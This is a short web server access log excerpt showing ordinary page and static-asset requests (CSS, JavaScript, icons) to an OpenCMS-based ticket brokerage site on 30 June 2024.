158.220.124.16 - - [30/Jun/2024:02:47:45 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=D38A75EF-0F2E-99D7-BE2D-1257A3573610&sortorder=desc&column=price HTTP/1.1" 404 -
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 91208
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery-ui.css HTTP/1.1" 200 33221
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71935
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery.fancybox.css HTTP/1.1" 200 4939
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery-ui.js HTTP/1.1" 200 228088
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.fancybox.pack.js HTTP/1.1" 200 23187
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/stickyfill.min.js HTTP/1.1" 200 5672
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/img/icons/no.png HTTP/1.1" 200 1958
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/img/icons/se.png HTTP/1.1" 200 1258
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/common-ajax.js HTTP/1.1" 200 20175
82.58.24.246 - - [30/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/img/fb.png HTTP/1.1" 200 1269
